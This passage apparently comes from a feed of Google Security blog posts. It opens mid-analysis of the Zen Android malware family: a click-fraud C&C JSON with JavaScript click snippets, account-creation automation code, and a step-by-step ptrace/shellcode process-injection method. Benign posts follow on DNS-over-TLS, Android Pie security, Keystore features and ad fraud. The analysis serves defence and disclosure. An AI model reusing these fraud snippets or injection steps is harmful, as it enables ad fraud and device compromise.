screen. In all cases, the ads are used to convince users to install other apps from different developer accounts, but written by the same group. Those apps use the same techniques to monetize their actions. Click fraud appsThe authors’ tactics evolved from advertisement spam to real PHA (Click Fraud). Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them. This allows the PHA authors to monetize their apps more effectively than through regular advertising. This behavior negatively impacts advertisement networks and their clients because advertising budget is spent without acquiring real customers, and impacts user experience by consuming their data plan resources. The click fraud PHA requests a URL to the advertising network directly instead of proxying it through an additional SDK. The command & control server (C&C server) returns the URL to click along with a very long list of additional parameters in JSON format. After rendering the ad on the screen, the app tries to identify the part of the advertisement website to click. If that part is found, the app loads Javascript snippets from the JSON parameters to click a button or other HTML element, simulating a real user click. Because a user interacting with an ad often leads to a higher chance of the user purchasing something, ad networks often “pay per click” to developers who host their ads. Therefore, by simulating fraudulent clicks, these developers are making money without requiring a user to click on an advertisement. This example code shows a JSON reply returned by the C&C server. It has been shortened for brevity. { “data”: [{ “id”: “107”, “url”: “<ayud_url>”, “click_type”: “2”, “keywords_js”: [{ “keyword”: “<a class=\”show_hide btnnext\””, “js”: “javascript:window:document.getElementsByClassName(\”show_hide btnnext\”)[0].click();”, { “keyword”: “value=\”Subscribe\” id=\”sub-click\””, “js”: “javascript:window:document.getElementById(\”sub-click\”).click();”Based on this JSON reply, the app looks for an HTML snippet that corresponds to the active element (show_hide btnnext) and, if found, the Javascript snippet tries to perform a click() method on it. Rooting trojansThe Zen authors have also created a rooting trojan. Using a publicly available rooting framework, the PHA attempts to root devices and gain persistence on them by reinstalling itself on the system partition of rooted device. Installing apps on the system partition makes it harder for the user to remove the app. This technique only works for unpatched devices running Android 4.3 or lower. Devices running Android 4.4 and higher are protected by Verified Boot. Zen’s rooting trojan apps target a specific device model with a very specific system image. After achieving root access the app tries to replace the framework.jar file on the system partition. Replicating framework.jar allows the app to intercept and modify the behavior of the Android standard API. In particular, these apps try to add an additional method called statistics() into the Activity class. When inserted, this method runs every time any Activity object in any Android app is created. This happens all the time in regular Android apps, as Activity is one of the fundamental Android UI elements. The only purpose of this method is to connect to the C&C server. The Zen trojanAfter achieving persistence, the trojan downloads additional payloads, including another trojan called Zen. Zen requires root to work correctly on the Android operating system. The Zen trojan uses its root privileges to turn on accessibility service (a service used to allow Android users with disabilities to use their devices) for itself by writing to a system-wide setting value enabled_accessibility_services. Zen doesn’t even check for the root privilege: it just assumes it has it. This leads us to believe that Zen is just part of a larger infection chain. The trojan implements three accessibility services directed at different Android API levels and uses these accessibility services, chosen by checking the operating system version, to create new Google accounts. This is done by opening the Google account creation process and parsing the current view. The app then clicks the appropriate buttons, scrollbars, and other UI elements to go through account sign-up without user intervention. During the account sign-up process, Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA. To get around this, the app then uses its root privilege to inject code into the Setup Wizard, extract the CAPTCHA image, and sends it to a remote server to try to solve the CAPTCHA. It is unclear if the remote server is capable of solving the CAPTCHA image automatically or if this is done manually by a human in the background. After the server returns the solution, the app enters it into the appropriate text field to complete the CAPTCHA challenge. The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding. It’s one of the strings – “How you’ll sign in” – that it looks for during the account creation process. The code snippet below shows part of the screen parsing process. if (!title.containsKey(“Enter the code”)) { if (!title.containsKey(“Basic information”)) { if (!title.containsKey(new String(android.util.Base64.decode(“SG93IHlvdeKAmWxsIHNpZ24gaW4=”.getBytes(), 0)))) { if (!title.containsKey(“Create password”)) { if (!title.containsKey(“Add phone number”)) {Apart from injecting code to read the CAPTCHA, the app also injects its own code into the system_server process, which requires root privileges. This indicates that the app tries to hide itself from any anti-PHA systems that look for a specific app process name or does not have the ability to scan the memory of the system_server process. The app also creates hooks to prevent the phone from rebooting, going to sleep or allowing the user from pressing hardware buttons during the account creation process. These hooks are created using the root access and a custom native code called Lmt_INJECT, although the algorithm for this is well known. First, the app has to turn off SELinux protection. Then the app finds a process id value for the process it wants to inject with code. This is done using a series of syscalls as outlined below. The “source process” refers to the Zen trojan running as root, while the “target process” refers to the process to which the code is injected and [pid] refers to the target process pid value. The source process checks the mapping between a process id and a process name. This is done by reading the /proc/[pid]/cmdline file.This very first step fails in Android 7.0 and higher, even with a root permission. The /proc filesystem is now mounted with a hidepid=2 parameter, which means that the process cannot access other process /proc/[pid] directory. A ptrace_attach syscall is called. This allows the source process to trace the target. The source process looks at its own memory to calculate the offset between the beginning of the libc library and the mmap address. The source process reads /proc/[pid]/maps to find where libc is located in the target process memory. By adding the previously calculated offset, it can get the address of the mmap function in the target process memory. The source process tries to determine the location of dlopen, dlsym, and dlclose functions in the target process. It uses the same technique as it used to determine the offset to the mmap function. The source process writes the native shellcode into the memory region allocated by mmap. Additionally, it also writes addresses of dlopen, dlsym, and dlclose into the same region, so that they can be used by the shellcode. Shellcode simply uses dlopen to open a .so file within the target process and then dlsym to find a symbol in that file and run it. The source process changes the registers in the target process so that PC register points directly to the shellcode. This is done using the ptrace syscall.This diagram illustrates the whole process. SummaryPHA authors go to great lengths to come up with increasingly clever ways to monetize their apps. Zen family PHA authors exhibit a wide range of techniques, from simply inserting an advertising SDK to a sophisticated trojan. The app that resulted in the largest number of affected users was the click fraud version, which was installed over 170,000 times at its peak in February 2018. The most affected countries were India, Brazil, and Indonesia. In most cases, these click fraud apps were uninstalled by the users, probably due to the low quality of the apps. If Google Play Protect detects one of these apps, Google Play Protect will show a warning to users. We are constantly on the lookout for new threats and we are expanding our protections. Every device with Google Play includes Google Play Protect and all apps on Google Play are automatically and periodically scanned by our solutions. You can check the status of Google Play Protect on your device: Open your Android device’s Google Play Store app. Tap Menu>Play Protect. Look for information about the status of your device.Hashes of samplesType Package name SHA256 digest Custom ads com.targetshoot.zombieapocalypse.sniper.zombieshootinggame 5d98d8a7a012a858f0fa4cf8d2ed3d5a82937b1a98ea2703d440307c63c6c928 Click fraud com.counterterrorist.cs.elite.combat.shootinggame 84672fb2f228ec749d3c3c1cb168a1c31f544970fd29136bea2a5b2cefac6d04 Rooting trojan com.android.world.news bd233c1f5c477b0cc15d7f84392dab3a7a598243efa3154304327ff4580ae213 Zen trojan com.lmt.register eb12cd65589cbc6f9d3563576c304273cb6a78072b0c20a155a0951370476d8d […]

  • Google Public DNS now supports DNS-over-TLS
    by Google Security PR on January 9, 2019 at 6:29 pm

    Posted by Marshall Vale, Product Manager and Puneet Sood, Software EngineerGoogle Public DNS is the world’s largest public Domain Name Service (DNS) recursive resolver, allowing anyone to convert Internet domain names like www.example.com into Internet addresses needed by an email application or web browser. Just as your search queries can expose sensitive information, the domains you lookup via DNS can also be sensitive. Starting today, users can secure queries between their devices and Google Public DNS with DNS-over-TLS, preserving their privacy and integrity.The DNS environment has changed for the better since we launched Google Public DNS over eight years ago. Back then, as today, part of Google Public DNS’ mission has been to improve the security and accuracy of DNS for users all over the world. But today, there is an increased awareness of the need to protect users’ communication with their DNS resolvers against forged responses and safeguard their privacy from network surveillance. The DNS-over-TLS protocol specifies a standard way to provide security and privacy for DNS traffic between users and their resolvers. Now users can secure their connections to Google Public DNS with TLS, the same technology that protects their HTTPS web connections.We implemented the DNS-over-TLS specification along with the RFC 7766 recommendations to minimize the overhead of using TLS. These include support for TLS 1.3 (for faster connections and improved security), TCP fast open, and pipelining of multiple queries and out-of-order responses over a single connection. All of this is deployed with Google’s serving infrastructure which provides reliable and scalable management for DNS-over-TLS connections.Use DNS-over-TLS todayAndroid 9 (Pie) device users can use DNS-over-TLS today. For configuration instructions for Android and other systems, please see the documentation. Advanced Linux users can use the stubby resolver from dnsprivacy.org to talk to Google’s DNS-over-TLS service.If you have a problem with Google Public DNS-over-TLS, you can create an issue on our tracker or ask on our discussion group. As always, please provide as much information as possible to help us investigate the problem! […]

  • Android Pie à la mode: Security & Privacy
    by Aaron Stein on December 20, 2018 at 6:40 pm

    Posted by Vikrant Nanda and René Mayrhofer, Android Security & Privacy Team[Cross-posted from the Android Developers Blog]There is no better time to talk about Android dessert releases than the holidays because who doesn’t love dessert? And what is one of our favorite desserts during the holiday season? Well, pie of course. In all seriousness, pie is a great analogy because of how the various ingredients turn into multiple layers of goodness: right from the software crust on top to the hardware layer at the bottom. Read on for a summary of security and privacy features introduced in Android Pie this year.Platform hardeningWith Android Pie, we updated File-Based Encryption to support external storage media (such as, expandable storage cards). We also introduced support for metadata encryption where hardware support is present. With filesystem metadata encryption, a single key present at boot time encrypts whatever content is not encrypted by file-based encryption (such as, directory layouts, file sizes, permissions, and creation/modification times).Android Pie also introduced a BiometricPrompt API that apps can use to provide biometric authentication dialogs (such as, fingerprint prompt) on a device in a modality-agnostic fashion. This functionality creates a standardized look, feel, and placement for the dialog. This kind of standardization gives users more confidence that they’re authenticating against a trusted biometric credential checker.New protections and test cases for the Application Sandbox help ensure all non-privileged apps targeting Android Pie (and all future releases of Android) run in stronger SELinux sandboxes. By providing per-app cryptographic authentication to the sandbox, this protection improves app separation, prevents overriding safe defaults, and (most significantly) prevents apps from making their data widely accessible.Anti-exploitation improvementsWith Android Pie, we expanded our compiler-based security mitigations, which instrument runtime operations to fail safely when undefined behavior occurs.Control Flow Integrity (CFI) is a security mechanism that disallows changes to the original control flow graph of compiled code. In Android Pie, it has been enabled by default within the media frameworks and other security-critical components, such as for Near Field Communication (NFC) and Bluetooth protocols. We also implemented support for CFI in the Android common kernel, continuing our efforts to harden the kernel in previous Android releases.Integer Overflow Sanitization is a security technique used to mitigate memory corruption and information disclosure vulnerabilities caused by integer operations. We’ve expanded our use of Integer Overflow sanitizers by enabling their use in libraries where complex untrusted input is processed or where security vulnerabilities have been reported.Continued investment in hardware-backed security One of the highlights of Android Pie is Android Protected Confirmation, the first major mobile OS API that leverages a hardware-protected user interface (Trusted UI) to perform critical transactions completely outside the main mobile operating system. Developers can use this API to display a trusted UI prompt to the user, requesting approval via a physical protected input (such as, a button on the device). The resulting cryptographically signed statement allows the relying party to reaffirm that the user would like to complete a sensitive transaction through their app. We also introduced support for a new Keystore type that provides stronger protection for private keys by leveraging tamper-resistant hardware with dedicated CPU, RAM, and flash memory. StrongBox Keymaster is an implementation of the Keymaster hardware abstraction layer (HAL) that resides in a hardware security module. This module is designed and required to have its own processor, secure storage, True Random Number Generator (TRNG), side-channel resistance, and tamper-resistant packaging. Other Keystore features (as part of Keymaster 4) include Keyguard-bound keys, Secure Key Import, 3DES support, and version binding. Keyguard-bound keys enable use restriction so as to protect sensitive information. Secure Key Import facilitates secure key use while protecting key material from the application or operating system. You can read more about these features in our recent blog post as well as the accompanying release notes.Enhancing user privacyUser privacy has been boosted with several behavior changes, such as limiting the access background apps have to the camera, microphone, and device sensors. New permission rules and permission groups have been created for phone calls, phone state, and Wi-Fi scans, as well as restrictions around information retrieved from Wi-Fi scans. We have also added associated MAC address randomization, so that a device can use a different network address when connecting to a Wi-Fi network.On top of that, Android Pie added support for encrypting Android backups with the user’s screen lock secret (that is, PIN, pattern, or password). By design, this means that an attacker would not be able to access a user’s backed-up application data without specifically knowing their passcode. Auto backup for apps has been enhanced by providing developers a way to specify conditions under which their app’s data is excluded from auto backup. For example, Android Pie introduces a new flag to determine whether a user’s backup is client-side encrypted.As part of a larger effort to move all web traffic away from cleartext (unencrypted HTTP) and towards being secured with TLS (HTTPS), we changed the defaults for Network Security Configuration to block all cleartext traffic. We’re protecting users with TLS by default, unless you explicitly opt-in to cleartext for specific domains. Android Pie also adds built-in support for DNS over TLS, automatically upgrading DNS queries to TLS if a network’s DNS server supports it. This protects information about IP addresses visited from being sniffed or intercepted on the network level.We believe that the features described in this post advance the security and privacy posture of Android, but you don’t have to take our word for it. Year after year our continued efforts are demonstrably resulting in better protection as evidenced by increasing exploit difficulty and independent mobile security ratings. Now go and enjoy some actual pie while we get back to preparing the next Android dessert release!Making Android more secure requires a combination of hardening the platform and advancing anti-exploitation techniques.Acknowledgements: This post leveraged contributions from Chad Brubaker, Janis Danisevskis, Giles Hogben, Troy Kensinger, Ivan Lozano, Vishwath Mohan, Frank Salim, Sami Tolvanen, Lilian Young, and Shawn Willden. […]

  • New Keystore features keep your slice of Android Pie a little safer
    by Google Security PR on December 12, 2018 at 6:44 pm

    Posted by Lilian Young and Shawn Willden, Android Security; and Frank Salim, Google Pay[Cross-posted from the Android Developers Blog] New Android Pie Keystore FeaturesThe Android Keystore provides application developers with a set of cryptographic tools that are designed to secure their users’ data. Keystore moves the cryptographic primitives available in software libraries out of the Android OS and into secure hardware. Keys are protected and used only within the secure hardware to protect application secrets from various forms of attacks. Keystore gives applications the ability to specify restrictions on how and when the keys can be used. Android Pie introduces new capabilities to Keystore. We will be discussing two of these new capabilities in this post. The first enables restrictions on key use so as to protect sensitive information. The second facilitates secure key use while protecting key material from the application or operating system. Keyguard-bound keysThere are times when a mobile application receives data but doesn’t need to immediately access it if the user is not currently using the device. Sensitive information sent to an application while the device screen is locked must remain secure until the user wants access to it. Android Pie addresses this by introducing keyguard-bound cryptographic keys. When the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern, or password, any attempt to use these keys will result in an invalid operation. Keyguard-bound keys protect the user’s data while the device is locked, and only available when the user needs it. Keyguard binding and authentication binding both function in similar ways, except with one important difference. Keyguard binding ties the availability of keys directly to the screen lock state while authentication binding uses a constant timeout. With keyguard binding, the keys become unavailable as soon as the device is locked and are only made available again when the user unlocks the device. It is worth noting that keyguard binding is enforced by the operating system, not the secure hardware. This is because the secure hardware has no way to know when the screen is locked. Hardware-enforced Android Keystore protection features like authentication binding, can be combined with keyguard binding for a higher level of security. Furthermore, since keyguard binding is an operating system feature, it’s available to any device running Android Pie. Keys for any algorithm supported by the device can be keyguard-bound. To generate or import a key as keyguard-bound, call setUnlockedDeviceRequired(true) on the KeyGenParameterSpec or KeyProtection builder object at key generation or import. Secure Key ImportSecure Key Import is a new feature in Android Pie that allows applications to provision existing keys into Keystore in a more secure manner. The origin of the key, a remote server that could be sitting in an on-premise data center or in the cloud, encrypts the secure key using a public wrapping key from the user’s device. The encrypted key in the SecureKeyWrapper format, which also contains a description of the ways the imported key is allowed to be used, can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key. Keys are encrypted in transit and remain opaque to the application and operating system, meaning they’re only available inside the secure hardware into which they are imported. Secure Key Import is useful in scenarios where an application intends to share a secret key with an Android device, but wants to prevent the key from being intercepted or from leaving the device. Google Pay uses Secure Key Import to provision some keys on Pixel 3 phones, to prevent the keys from being intercepted or extracted from memory. There are also a variety of enterprise use cases such as S/MIME encryption keys being recovered from a Certificate Authorities escrow so that the same key can be used to decrypt emails on multiple devices. To take advantage of this feature, please review this training article. Please note that Secure Key Import is a secure hardware feature, and is therefore only available on select Android Pie devices. To find out if the device supports it, applications can generate a KeyPair with PURPOSE_WRAP_KEY. […]

  • Tackling ads abuse in apps and SDKs
    by Google Security PR on December 7, 2018 at 5:05 pm

    Posted by Dave Kleidermacher, VP, Head of Security & Privacy – Android & PlayProviding users with safe and secure experiences, while helping developers build and grow quality app businesses, is our top priority at Google Play. And we’re constantly working to improve our protections.Google Play has been working to minimize app install attribution fraud for several years. In 2017 Google Play made available the Google Play Install Referrer API, which allows ad attribution providers, publishers and advertisers to determine which referrer was responsible for sending the user to Google Play for a given app install. This API was specifically designed to be resistant to install attribution fraud and we strongly encourage attribution providers, advertisers and publishers to insist on this standard of proof when measuring app install ads. Users, developers, advertisers and ad networks all benefit from a transparent, fair system.We also take reports of questionable activity very seriously. If an app violates our Google Play Developer policies, we take action. That’s why we began our own independent investigation after we received reports of apps on Google Play accused of conducting app install attribution abuse by falsely claiming credit for newly installed apps to collect the download bounty from that app’s developer.We now have an update regarding our ongoing investigation:On Monday, we removed two apps from the Play Store because our investigation discovered evidence of app install attribution abuse.We also discovered evidence of app install attribution abuse in 3 ad network SDKs. We have asked the impacted developers to remove those SDKs from their apps. Because we believe most of these developers were not aware of the behavior from these third-party SDKs, we have given them a short grace period to take action.Google Ads SDKs were not utilized for any of the abusive behaviors mentioned above.Our investigation is ongoing and additional reviews of other apps and third party SDKs are still underway. If we find evidence of additional policy violations, we will take action.We will continue to investigate and improve our capabilities to better detect and protect against abusive behavior and the malicious actors behind them. […]

WordPress Appliance - Powered by TurnKey Linux